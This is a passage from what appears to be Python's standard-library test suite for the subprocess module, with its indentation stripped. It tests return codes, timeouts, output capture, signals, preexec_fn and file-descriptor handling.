# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
